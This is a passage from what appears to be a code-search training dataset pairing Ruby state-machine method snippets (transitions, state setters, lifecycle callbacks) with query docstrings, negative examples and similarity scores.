"def with_keeping_state\n if control.key? :saved\n state_machine.load_current_state(control[:saved])\n else\n state_machine.set_initial_state\n end\n yield\n control[:saved] = state_machine.save_current_state \n end",
"def state=(value)\n @state = value\n end",
"def transition_to_state(state)\n @engine.dispatch do\n run_state!(state)\n end\n \n state\n end",
"def update_state(*args)\n if transition_choice?\n found_trans = machine.select_transition(name, *args)\n machine.state = found_trans.to_states.first\n else\n transitions = machine.transitions[name]\n machine.state = transitions[machine.state] || transitions[ANY_STATE] || name\n end\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def transition\n new_state = fetch_sensor_state\n return if new_state == @state\n puts \"Transitioned from #{@state} to #{new_state}\"\n if valid_transition?(new_state)\n @state = new_state\n # Do nothing\n else\n puts \"Invalid transition!\"\n @beam_broken = 0\n # TODO: toss up the correct error light\n end\n end",
"def state\n @actions << :state\n self.class.mocked_states.shift\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def states\n raise \"You must override the states method.\"\n end",
"def on_start_exit(new_state, event, *args)\n @log.debug \" [#{current_state}]: on_exit : #{event} -> #{new_state}; args: #{args}\"\n @context = Context.new(current_state,@lsi)\n end",
"def update\n \t@currentState.update\n\tend",
"def mon_try_enter\n @mon_data.try_enter\n end",
"def answer_on_incoming()\n update({:state => 'active'})\n reload()\n end",
"def state(name)\n @state.push(name)\n end",
"def impose_state(s) # :args: state\n @_hegemon_state = s\n nil end",
"def setState(state)\n\t\t\traise \"undefined state.\\n\" if state.nil?\n\t\t\traise \"#{state} is not a Statemap.State.\\n\" unless state.is_a?(Statemap::State)\n\t\t\t@_state = state\n\t\t\tif @_debug_flag then\n\t\t\t\t@_debug_stream.puts \"ENTER STATE : %s\\n\" % @_state.getName\n\t\t\tend\n\t\tend",
"def state\r\n {\r\n scene: type, prompt: prompt\r\n }\r\n end",
"def state_initialized!\n transition_to_state(:finished)\n end",
"def setup(state) ; end",
"def passing\n state(\"passing\")\n end",
"def read_state\n end"
] |
[
"0.864452",
"0.7388078",
"0.7267375",
"0.7100114",
"0.7008565",
"0.69991297",
"0.6852792",
"0.6739538",
"0.673245",
"0.66867673",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6517782",
"0.649624",
"0.64776254",
"0.64375514",
"0.64014673",
"0.63847995",
"0.63847995",
"0.63814396",
"0.6360734",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6244888",
"0.6239195",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.6187649",
"0.6179513",
"0.61584514",
"0.6113768",
"0.60563725",
"0.5988011",
"0.5966556",
"0.59513795",
"0.5931095",
"0.5914714",
"0.59058326",
"0.58991075",
"0.5887797",
"0.58473074",
"0.5840666",
"0.58312285",
"0.5830605",
"0.5826673",
"0.5823605",
"0.5821576",
"0.5816636",
"0.58106583",
"0.5804845",
"0.5804769",
"0.58012015",
"0.58011687",
"0.5784152",
"0.57780004",
"0.5761604",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750109",
"0.57400703",
"0.5715863",
"0.5715863",
"0.5715863",
"0.5709481",
"0.56913",
"0.5670019",
"0.56482553",
"0.5630037",
"0.562261",
"0.56191045",
"0.5618563",
"0.5612316",
"0.5605534",
"0.5605052",
"0.56046164",
"0.56018704",
"0.55864024"
] |
0.0
|
-1
|
Called by Machine when State is exited.
|
def exit! machine, args
_behavior! :exit, machine, args
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def exit_state\n end",
"def exit e\n raise StateProcessorExit, e\n end",
"def exit_state\n puts \"Exiting #{self.class}\"\n execution_state = EXECUTION_STATE[:completed]\n end",
"def exit(state_manager, game)\n exiting = true\n end",
"def exit!\n map = @transition_map\n map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:unarm)\n end\n end\n\n @exit_actions.each do |exit_action|\n exit_action.call(@state_machine)\n end\n @state_machine.current_state = nil\n end",
"def exit\n case @status\n when :sleep\n wake_resume(:exit)\n when :run\n throw :exit\n end\n end",
"def on_exit(&block)\n @state.exit_actions << block\n end",
"def at_exit\n\n\t\tend",
"def exited?(*) end",
"def on_exit\n end",
"def shut_down\n end",
"def endState(tag)\n raise \"Not implemented\"\n end",
"def exit() end",
"def handle_exit(event)\n @status = :terminated_by_management\n @exit_code = event[:data]\n end",
"def leave; end",
"def terminates\n event :failed, command: true, terminal: true\n interruptible\n end",
"def exit\n Rushmate::Exit\n end",
"def exit!() end",
"def stop_and_cleanup\n raise_outside_initial_queue\n @state_machine.log \"Stopping #{self}...\" if @verbose\n @current_state.send :exit!\n @current_state = nil\n @state_symbols_to_states.values.each(&:cleanup)\n end",
"def shutdown_execution\n stopped_event.set\n end",
"def after_exit(&block)\n end",
"def cmd_exit(*args)\n\t\tshell.stop\n\tend",
"def mark_as_exit\n @exit = true\n end",
"def register_exit\n if @state > 0\n @state -= 1\n else\n raise \"Queue #{@label} is empty. Cannot register exit.\"\n end\n end",
"def unclean_shutdown_state\n super\n end",
"def exit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 26 )\n\n type = EXIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 328:8: 'exit'\n match( \"exit\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 26 )\n\n end",
"def shutdown\n log 'Exiting...'\n @shutdown = true\n end",
"def exit\n\t\tquit\n\tend",
"def shutdown\n @snmptrap.exit\n end",
"def check_out\n @server[\"/worker\"].put({\n :name => @name,\n :terminated => true\n })\n log 'exiting'\n end",
"def shutdown\n end",
"def exit\n raise ActionExit.new\n end",
"def state_removed! statemachine\n transitions_changed!\n end",
"def handle_exit\n __exit! if respond_to?(:__exit!)\n exit(0)\n end",
"def shutdown\n end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown\n end",
"def shutdown\n end",
"def shutdown\n end",
"def shutdown\n end",
"def finish() #method\n puts \"Menu cooked successfully.\"\n exit\n end",
"def exit_program\n exit\n end",
"def shutdown\n logger.info('Shutting down ...')\n @lock.synchronize do\n @shutdown = true\n end\n\n reset\n exit\n end",
"def shutdown\n @stopped = false\n end",
"def exit \n \"exit\" \n end",
"def at_exit(&block); end",
"def game_exit\n Message.game_quit\n false\n end",
"def exit\n send_cmd \"exit\"\n nil\n end",
"def shutdown\r\n\t\t\tsay \"#{name}: Exiting...\"\r\n\t\t\t@shutdown = true\r\n\t end",
"def on_exit(status)\n RightLinkLog.debug(format_log_message(\"Stopping pipe server\"))\n @pipe_server.stop\n @pipe_server = nil\n\n RightLinkLog.debug(format_log_message(\"Stopping chef node server\"))\n RightScale::Windows::ChefNodeServer.instance.stop\n\n RightLinkLog.debug(format_log_message(\"Terminated\"))\n @response_event.signal\n end",
"def close\r\n pop_game_state\r\n end",
"def quit(msg)\n if @started\n msg.reply('Game exited.'.freeze)\n @started = false\n @random_number = nil\n @tries = nil\n else\n msg.reply('There is not game to exit.'.freeze)\n end\n end",
"def exit &block\n @actions[:exit] = block\n end",
"def shutdown\n @done = true\n end",
"def shutdown\n @done = true\n end",
"def exit_program\n exit\n end",
"def on_exit\n\t\tputs \"live coding history: #{@history.size} states\"\n\tend",
"def exit\n check_running\n @running = false\n @dispatchers.each(&:exit)\n @pool.exit\n end",
"def shut_down\n puts\n end",
"def exit\n ExitThread(0)\n end",
"def irb_exit(ret = 0)\n irb_context.exit(ret)\n end",
"def shutdown\n sysout(\"System going for shutdown\")\n #Do I/O (save to file for example)\n puts(\"Food Item Tracker Terminated\")\n end",
"def shutdown\n sysout(\"System going for shutdown\")\n #Do I/O (save to file for example)\n puts(\"Food Item Tracker Terminated\")\n end",
"def on_start_exit(new_state, event, *args)\n @log.debug \" [#{current_state}]: on_exit : #{event} -> #{new_state}; args: #{args}\"\n @context = Context.new(current_state,@lsi)\n end",
"def shutdown\n puts \"shutting down\"\n @run = false\n thread_list.each do |thread|\n thread.raise ExitError\n end\n end",
"def coolest_exit\n Kernel.exit! 99\n end",
"def after_state(state)\n end",
"def shutdown\n\tend",
"def shutdown(editted, database, log)\n\tsysout(\"System going for Shutdown\")\n\tsave(database)\n\tsaveLog(log)\n\tabort(\"Diet Manager Terminated\")\nend",
"def exit(env_ptr, code)\n @devices.each_value do |device|\n device.close\n end\n \n unless code == 0\n # Abnormal exit codes can indicate a CLIPS SYSTEM ERROR\n # This gives developers a chance to catch debugging information\n raise ExitError.new(code)\n end\n \n code\n end",
"def each_exit(&block)\n @exits.each &block\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def exit\n @interface.hide\n # sth to destroy all dat shit??\n # Shut down propeller\n end",
"def shutdown\n @running = false\n \n super\n \n end",
"def leave()\n raise NotImplementedError\n end",
"def finaliser_finished(source, *args)\n @manager.allure_stop\n end",
"def stop()\n @state = STOPPED\n end",
"def shutdown\n reset\n @agent.shutdown\n end",
"def exit\n @server.check_out(@host) unless @server.nil?\n end",
"def shutdown\n shutdown_message\n @actions.each(&:shutdown)\n @threads.each(&:exit)\n end",
"def exit(ret = 0)\n IRB.irb_exit(@irb, ret)\n rescue UncaughtThrowError\n super\n end",
"def exit_concurrent(opts)\n @substates.each { |substate| substate.exit(opts) }\n call_exit_handler(opts[:context])\n @__is_current__ = false\n trace_state(\"State: [EXIT] : #{self.path}\") if self != root\n self\n end",
"def shut_down\n @shutdown_lock.synchronize {\n return if @shutting_down\n @shutting_down = true\n }\n die NO_ERROR\n end",
"def exit_build\n build_stack.pop\n end",
"def delayed_exit\n sleep 0.1\n exit\n end",
"def on_shutdown\n\t\tend",
"def on_leave\n fire_handler :LEAVE, self\n end",
"def destroyed(event)\n self.state = nil if event.target.data[:id] == state\n refresh\n end",
"def exit(args)\nend",
"def send_exit(recipient, reason)\n recipient.notify_exited(CURRENT.value, reason)\n self\n end",
"def terminate\n end",
"def exit(res=0) end",
"def end_hook name\n # this should be implemented in sub-classes\n end",
"def terminate() end"
] |
[
"0.7859571",
"0.7460003",
"0.7445855",
"0.74094474",
"0.73574936",
"0.693379",
"0.69150406",
"0.6909679",
"0.68527645",
"0.67798895",
"0.6739769",
"0.6709862",
"0.67062205",
"0.66558194",
"0.6646841",
"0.66213185",
"0.6604686",
"0.65873843",
"0.6531353",
"0.65146357",
"0.6497114",
"0.64210963",
"0.6405017",
"0.63637245",
"0.63381785",
"0.63174874",
"0.6307309",
"0.6231059",
"0.6216333",
"0.61940575",
"0.6191872",
"0.61917627",
"0.6190087",
"0.6189733",
"0.61714983",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.61521405",
"0.61521405",
"0.61521405",
"0.61521405",
"0.6151212",
"0.61374974",
"0.6134097",
"0.6119675",
"0.61111814",
"0.6107732",
"0.6102899",
"0.6095746",
"0.6085924",
"0.6085506",
"0.6083478",
"0.60815966",
"0.6080869",
"0.60787594",
"0.60787594",
"0.6072663",
"0.60606223",
"0.6060544",
"0.60540265",
"0.6050191",
"0.60496455",
"0.6047735",
"0.6047735",
"0.60337013",
"0.6021641",
"0.60202557",
"0.6017827",
"0.601327",
"0.6000152",
"0.59973675",
"0.59840477",
"0.5980364",
"0.597652",
"0.597551",
"0.5966603",
"0.5964685",
"0.59593135",
"0.59573925",
"0.5953139",
"0.59485394",
"0.5945875",
"0.5945039",
"0.59448963",
"0.59402156",
"0.5938599",
"0.5934364",
"0.59343165",
"0.5915855",
"0.5903802",
"0.59000635",
"0.589521",
"0.58950007",
"0.5893088",
"0.58912426"
] |
0.663212
|
15
|
Called by Machine when State is transitioned to.
|
def doActivity! machine, args
_behavior! :doActivity, machine, args
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def enter_state\n end",
"def transition\n new_state = fetch_sensor_state\n return if new_state == @state\n puts \"Transitioned from #{@state} to #{new_state}\"\n if valid_transition?(new_state)\n @state = new_state\n # Do nothing\n else\n puts \"Invalid transition!\"\n @beam_broken = 0\n # TODO: toss up the correct error light\n end\n end",
"def transition_to_state(state)\n @engine.dispatch do\n run_state!(state)\n end\n \n state\n end",
"def transition(symbol, to)\n @subject.transitions[@state][symbol] = to\n end",
"def state_changed\n @state_condition.signal @state\n end",
"def transition_to(state)\n puts \"Context: Transition to #{state.class}\"\n @state = state\n @state.context = self\n end",
"def transition_to(state)\n puts \"Context: Transition to #{state.class}\"\n @state = state\n @state.context = self\n end",
"def transition_state_machine!(new_state, emit_params = {})\n state_machine.transition_to!(new_state, emit_object(new_state, emit_params))\n end",
"def transition_state_machine(new_state, emit_params = {})\n state_machine.transition_state(new_state, emit_object(new_state, emit_params))\n end",
"def jump_to_state(state)\n logger.debug \"STATE JUMP! to #{state}\"\n \n render_state(state)\n end",
"def on_state_begin(state_id)\n end",
"def do_transition!( transition )\n state.trigger( transition.to_sym )\n self.save\n end",
"def after_state(state)\n end",
"def after_transition(*args, &block); end",
"def trigger!\n\treturn if (@next_state_name == nil)\n\n\tcurrent_state = nil\n current_state = @states.fetch(@current_state_name) unless @current_state_name.nil?\n\n\tnext_state = @states.fetch(@next_state_name)\n next_state_name = @next_state_name\n\n\t@next_state_name = nil\n\n\tcurrent_state.atexit if(current_state.respond_to?(:atexit))\n\t@current_state_name = next_state_name\n\tnext_state.atentry if(next_state.respond_to?(:atentry))\n end",
"def state_added! statemachine\n transitions_changed!\n end",
"def trans(from, to, name)\n StateMachineChecker::Transition.new(from, to, name)\nend",
"def transition_to(state)\n case state\n when :announced\n # announce successful; set state\n @state = :announced\n\n # Reset the entity timer\n @entity_last_seen = Time.now\n\n # Set last snapshot to 10 minutes ago\n # so we send a snapshot on first report\n @last_snapshot = Time.now - 601\n when :unannounced\n @state = :unannounced\n else\n ::Instana.logger.warn \"Uknown agent state: #{state}\"\n end\n end",
"def go_state (index)\n @state = @states[index]\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def finished!\n Mua::State::Transition.new(state: self.terminal_states[0])\n end",
"def transition(state, next_length)\n @logger.debug(\"Transitioning\", :transition => state, :nextlen => next_length)\n @state = state\n # TODO(sissel): Assert this self.respond_to?(state)\n # TODO(sissel): Assert next_length is a number\n need(next_length)\n end",
"def state\n end",
"def perform_state_update\n return unless state_changed?\n\n return if @ignore_state_changes\n\n case state_change\n when %w(mill_build buyer_unclaimed)\n transition_mill_build_to_buyer_unclaimed\n when %w(buyer_unclaimed buyer_build)\n transition_buyer_unclaimed_buyer_build\n when %w(buyer_build pending)\n transition_buyer_build_to_pending\n when %w(pending ordered)\n transition_pending_to_ordered\n when %w(ordered closed)\n transition_ordered_to_closed\n end\n end",
"def transition(old_state, new_state)\n \"#{old_state} -> #{new_state}\"\n end",
"def transitions; end",
"def update_state(*args)\n if transition_choice?\n found_trans = machine.select_transition(name, *args)\n machine.state = found_trans.to_states.first\n else\n transitions = machine.transitions[name]\n machine.state = transitions[machine.state] || transitions[ANY_STATE] || name\n end\n end",
"def execState\n findNextState\n current_state = @state_list[@state][@transition]\n\n @transition = eval \"#{@state}\"\n @history.push @state\n\n @finished = @state == :finish\n end",
"def transition_to(event)\n handle event\n @version = version.next\n end",
"def transition_at; end",
"def transition_at; end",
"def transition\n @transition ||= begin\n state_machine = MicroMachine.new( state || \"ready\" )\n\n state_machine.when(:start, \"ready\" => \"in_progress\")\n state_machine.when(:cancel, \"ready\" => \"cancelled\",\n \"in_progress\" => \"cancelled\")\n state_machine.when(:complete, \"in_progress\" => \"completed\")\n\n state_machine.on(:any) { self.state = transition.state }\n\n state_machine\n end\n end",
"def transition( trigger )\r\n raise \"Must set the current/start state first.\" unless @state\r\n\r\n initial_state = @state if $DEBUG\r\n\r\n handler_name = self.class.state_handler_name[ @state ]\r\n unless handler_name\r\n puts \"No handler for state #@state\" if $DEBUG\r\n return nil\r\n end\r\n\r\n # Invoke the handler for this state, passing in the trigger\r\n # and use the return value as the new state\r\n @state = send( handler_name, trigger )\r\n puts \"#{self}.transition(#{trigger}) :: #{initial_state} -> #@state\" if $DEBUG\r\n @state\r\n end",
"def transition_to(path, current_state=self.current_state)\n path = path.to_s\n state = current_state || self\n exit_states = []\n\n # Find the nearest parent state on the path of the current state which\n # has a sub-state at the given path\n new_states = state.find_states(path)\n while(!new_states) do\n exit_states << state\n state = state.parent_state\n raise(StateNotFound, transition_error(path)) unless state\n new_states = state.find_states(path)\n end\n\n # The first time we enter a state, the state_manager gets entered as well\n new_states.unshift(self) unless has_state?\n\n # Can only transition to leaf states\n # TODO: transition to the initial_state of the state?\n raise(InvalidTransition, transition_error(path)) unless new_states.last.leaf?\n\n enter_states = new_states - exit_states\n exit_states = exit_states - new_states\n\n from_state = current_state\n # TODO: does it make more sense to throw an error instead of allowing\n # a transition to the current state?\n to_state = enter_states.last || from_state\n\n run_before_callbacks(from_state, to_state, current_event, enter_states, exit_states)\n\n # Set the state on the underlying resource\n self.current_state = to_state\n\n run_after_callbacks(from_state, to_state, current_event, enter_states, exit_states)\n end",
"def enter!\n @state_machine.current_state = self\n\n @entry_actions.each do |entry_action|\n entry_action.call(@state_machine)\n end\n @transition_map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:arm)\n end\n end\n end",
"def change_state(next_state)\n @state = next_state\n if @verbose\n puts \"\\n================================================================================\\n\\n\"\n puts \"log: change state to \" + current_state_string\n end\n end",
"def to_state(*args)\n if transition_choice?\n found_trans = machine.select_choice_transition(name, from_state, *args)\n found_trans.map[from_state] || found_trans.map[ANY_STATE]\n else\n available_trans = machine.transitions[name]\n available_trans[from_state] || available_trans[ANY_STATE]\n end\n end",
"def update_state\n raise \"Nothing to do\"\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def on_state_timeup(state_id)\n end",
"def on_state(state, &block)\n end",
"def transition(name, from_names, to_name, options = {})\n Array(from_names).each do |from_name|\n @machine.transition(name, from_name, to_name, options)\n end\n nil # do not expose FSM details\n end",
"def switch_state(state)\n node.switch_state(state)\n end",
"def switch_state state\n\t\t\t@state_buffer = Proc.new do\n\t\t\t\t@objs2 = []\n\t\t\t\t@current_state = state\n\t\t\t\t@current_state.setup\n\t\t\tend\n\t\tend",
"def states; end",
"def passing\n state(\"passing\")\n end",
"def transition(event_name)\n if to = next_state(event_name)\n begin\n result = yield\n rescue => e\n if error_state = error_state(event_name, e)\n @subject.send(\"#{state_method}=\", error_state)\n return result\n else\n raise\n end\n end\n # TODO refactor out to AR module\n if defined?(::ActiveRecord) && @subject.is_a?(::ActiveRecord::Base)\n if @subject.errors.entries.empty?\n @subject.send(\"#{state_method}=\", to)\n return true\n else\n return false\n end\n else\n @subject.send(\"#{state_method}=\", to)\n return result\n end\n else\n illegal_event_callback event_name\n end\n end",
"def state\n @actions << :state\n self.class.mocked_states.shift\n end",
"def next_state\n newstate = state_transition_out\n newiteration = @iteration\n if [:day, :signup].include?(@state)\n newiteration = @iteration + 1\n end\n @state = newstate\n @iteration = newiteration\n #state_transition_in\n @state\n end",
"def state_removed! statemachine\n transitions_changed!\n end",
"def before_state(state)\n end",
"def apply( stack )\n\t\traise Pushdown::TransitionError, \"can't switch on an empty stack\" if stack.empty?\n\n\t\tstate = self.state_class.new( self.data )\n\n\t\tself.log.debug \"switching current state with a new state: %p\" % [ state ]\n\t\told_state = stack.pop\n\t\told_state.on_stop if old_state\n\n\t\tstack.push( state )\n\t\tstate.on_start\n\n\t\treturn stack\n\tend",
"def change_state(contestant_symbol, contestant_move)\n\t\t@current_state[contestant_move] = contestant_symbol\n\tend",
"def state_initialized!\n transition_to_state(:finished)\n end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def state= new_state\n @state = new_state\n end",
"def transitions_to(state)\n find_all_transitions(:to_state => state)\n end",
"def make_transition(transition)\n raise ArgumentError, \"Cannot transition from #{self.current_state} with #{transition}\" unless\n transition.from_state == self.current_state\n \n self.current_state = transition.to_state\n @available_actions = nil\n add_reward(transition.reward)\n end",
"def update_transitions\n from_states.each do |from|\n if (value = machine.transitions[name][from])\n machine.transitions[name][from] = [value, map[from]].flatten\n else\n machine.transitions[name][from] = map[from] || ANY_STATE\n end\n end\n end",
"def update_transition\r\n # If transition is processing\r\n if $game_temp.transition_processing\r\n # Clear transition processing flag\r\n $game_temp.transition_processing = false\r\n # Execute transition\r\n if $game_temp.transition_name == \"\"\r\n Graphics.transition(20)\r\n else\r\n Graphics.transition(40, \"Graphics/Transitions/\" +\r\n $game_temp.transition_name)\r\n end\r\n end\r\n end",
"def new_state\nnewID = @@nextID\n@@nextID += 1\n@state[newID] = true\n@transition[newID] = {}\nnewID\nend",
"def state_on_table_game_end\n @log.debug(\"Net_state: change to state state_on_table_game_end\")\n @network_state = :state_on_table_game_end\n make_state_change_ntfy(:ntfy_state_on_table_game_end)\n end",
"def after_transition(object, transition)\n\n # current_user_session = Session.activated? ? Session.find : nil\n #\n # if current_user_session\n # author = current_user_session.user\n # elsif object.respond_to?(:user)\n # author = object.user\n # end\n #\n # to_state = transition.attributes[:to_name]\n # object.state_events.create({\n # :previous_state => transition.attributes[:from],\n # :name => transition.attributes[:event].to_s,\n # :user_id => author && author.id\n # })\n #\n # ActiveRecord::Base.logger.info(\"#{object.class}##{object.id}: #{transition.attributes[:from]} => #{transition.attributes[:to]}\")\n end",
"def update_state(record, bang)\n record.send(\"#{machine.attribute}=\", @options[:to])\n bang ? record.save! : record.save\n end",
"def call_transition_method(*args)\n unless [:logger, :command_listener].include?(agent_type)\n log do |msg|\n msg.add_record(agent_type, \"action\", \"transit\")\n msg.add_record(agent_type, \"state\", args.first)\n msg.add_record(agent_type, \"uuid\", uuid)\n end\n end\n super\n end",
"def start_transition\n nil\n end",
"def state\n @state\n end",
"def update_transition\r\n # If transition processing\r\n if $game_temp.transition_processing\r\n # Clear transition processing flag\r\n $game_temp.transition_processing = false\r\n # Execute transition\r\n if $game_temp.transition_name == ''\r\n Graphics.transition(20)\r\n else\r\n Graphics.transition(40, 'Graphics/Transitions/' +\r\n $game_temp.transition_name)\r\n end\r\n end\r\n end",
"def transition(from, to)\n ev, *args = trigger(from)\n raise IllegalTransition, \"No transition to :#{ev}\" unless to.include?(ev)\n ev = yield ev if block_given?\n send \"perform_#{ev}\", *args\n end",
"def transition(from, to)\n ev, *args = trigger(from)\n raise IllegalTransition, \"No transition to :#{ev}\" unless to.include?(ev)\n ev = yield ev if block_given?\n send \"perform_#{ev}\", *args\n end",
"def resume(*)\n super.tap do\n __debug_sim(\"*** RESUME WORKFLOW STATE #{prev_state} ***\")\n end\n end",
"def state\n @state\n end",
"def enter_state\n puts \"Entering #{self.class}\"\n execution_state = EXECUTION_STATE[:active]\n end",
"def control_state_change(&block)\n # Look for a default transition\n default_transition = state_transitions.detect {|t| t.event == :take_default_path }\n\n if default_transition.present?\n # This ugly thing should yield the default transition first followed by\n # any other transitions to states that aren't the default...\n yield( [default_transition] + state_transitions.reject {|t| t.to == default_transition.to } )\n elsif state_transitions.present?\n # ...if there's no default transition but there are still other transitions\n # present then yield those.\n yield(state_transitions)\n end\n\n nil\n end",
"def state\n @state\n end",
"def local_transition!(state:)\n Mua::State::Transition.new(state: state, parent: false)\n end",
"def times_walked_to(state); end",
"def final_state(state)\n final_states(state)\n end",
"def synchronize_state_with_statemachine(*args)\n log_state_machine_state_change\n change_state state_machine.current_state, state_machine.last_transition.metadata\n end",
"def move_to_state(s)\n case s.to_sym\n when :pending\n register if passive?\n when :active\n activate if pending? || deleted?\n unsuspend if suspended?\n when :suspended\n suspend if passive? || pending? || active?\n when :deleted\n delete if passive? || pending? || active? || suspended?\n end\n end",
"def transition(&block)\n @transition_function = block\n end",
"def transition!(state:, parent: nil)\n Mua::State::Transition.new(state: state, parent: parent)\n end",
"def rollback\n each {|transition| transition.machine.write(object, :event, transition.event)}\n super\n end",
"def communicate_transition(_ = nil, _ = nil, _ = nil)\r\n end",
"def save\n @saved = @state\n end",
"def fire_state_changed\n @sce = ChangeEvent.new(self) if @sce.nil?\n fire_handler :STATE_CHANGE, @sce\n end",
"def live\r\n @state=1\r\n end",
"def after\n each {|transition| transition.machine.write(object, :event_transition, transition)} if skip_after && success?\n super\n end",
"def transitions\n raise NotImplementedError, 'Subclasses must override transitions'\n end",
"def state=(s)\n @state = s\n end"
] |
[
"0.73521835",
"0.7239314",
"0.6951051",
"0.69235647",
"0.6803045",
"0.6796859",
"0.6796859",
"0.6795984",
"0.6698488",
"0.66912794",
"0.6645278",
"0.6639114",
"0.6617801",
"0.6614779",
"0.6591182",
"0.6577655",
"0.6552369",
"0.65447086",
"0.6538006",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.65112245",
"0.6508864",
"0.6497885",
"0.6467895",
"0.6378109",
"0.63724816",
"0.6364416",
"0.63564765",
"0.633654",
"0.63363",
"0.63363",
"0.6327773",
"0.63238233",
"0.63233376",
"0.63017166",
"0.62901646",
"0.626313",
"0.6248591",
"0.62297726",
"0.62297726",
"0.62297726",
"0.61830443",
"0.6169265",
"0.61671543",
"0.61564404",
"0.61277133",
"0.6115696",
"0.6108254",
"0.60859597",
"0.6077148",
"0.6060042",
"0.6045967",
"0.60251886",
"0.60118043",
"0.60072577",
"0.59966344",
"0.5967236",
"0.5967236",
"0.5963642",
"0.59588754",
"0.59554315",
"0.59455234",
"0.5945496",
"0.59425455",
"0.5917181",
"0.5916204",
"0.591432",
"0.59115845",
"0.58969885",
"0.5893486",
"0.5893175",
"0.5886167",
"0.5878363",
"0.5878363",
"0.58752215",
"0.5850939",
"0.58490133",
"0.58444923",
"0.58358186",
"0.5833366",
"0.582803",
"0.5819042",
"0.5813428",
"0.5808069",
"0.58034307",
"0.57936823",
"0.57899165",
"0.5788142",
"0.57850546",
"0.5784966",
"0.57816",
"0.5777161",
"0.5772624",
"0.57718354"
] |
0.0
|
-1
|
Called after this State is added to the StateMachine.
|
def state_added! statemachine
transitions_changed!
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def after_state(state)\n end",
"def after_created\n super.tap do |val|\n app_state_bundle(self)\n end\n end",
"def after_created\n super.tap do |val|\n app_state_ruby(self)\n end\n end",
"def after_appending( state )\n\t\t# Nothing to do\n\t\treturn nil\n\tend",
"def after_created\n super.tap do |val|\n app_state_python(self)\n end\n end",
"def extra_state; end",
"def enter_state\n end",
"def post_init\n end",
"def before_appending( state )\n\t\t# Nothing to do\n\t\treturn nil\n\tend",
"def add_states(new_states); end",
"def after_initialize\n end",
"def chain_state\n super\n end",
"def post_initialize\n end",
"def post_initialize\n # raise NotImplementedError\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def after_initialized\n end",
"def post_init\n end",
"def initial_state=(new_initial_state); end",
"def callback_phase\n super\n end",
"def after_initialize(&block); end",
"def final_state(state)\n final_states(state)\n end",
"def after_save\n super\n run_after_instance_hooks(:after_save)\n @instance_hooks.clear if @instance_hooks\n end",
"def initialize\n @state = :new\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def before_state(state)\n end",
"def state_initialized!\n transition_to_state(:finished)\n end",
"def after_initialize; end",
"def after_initialize; end",
"def after_initialize; end",
"def after_initialize; end",
"def post_init()\n puts \"#{self} post_init done!\"\n end",
"def post_init()\n puts \"#{self} post_init done!\"\n end",
"def hash_more_data_state\n super\n end",
"def explicit_state\n super\n end",
"def state_removed! statemachine\n transitions_changed!\n end",
"def _after_update\n # SEQUEL5: Remove\n @this = nil\n end",
"def after_init\n end",
"def on_state_begin(state_id)\n end",
"def force_final_state\r\n @final_state = true\r\n end",
"def post_init\n\tend",
"def before_start\n super\n self.sub_state = :before unless self.sub_state\n end",
"def reset_state_at_page_finish\n add_content(\"\\nQ\" * @state_stack.size)\n end",
"def finalize\n lifecycle.container.each do |key, item|\n container.register(key, item) unless container.registered?(key)\n end\n self\n end",
"def setup_state_machine\n @line_number = 1\n reset_reading\n end",
"def unclean_shutdown_state\n super\n end",
"def after_rendering( state=nil )\n\t\t# Nothing to do\n\t\treturn nil\n\tend",
"def add_state(state)\n inferred_state = infer_state(state)\n self.states.upush! inferred_state if inferred_state\n end",
"def update_state\n raise \"Nothing to do\"\n end",
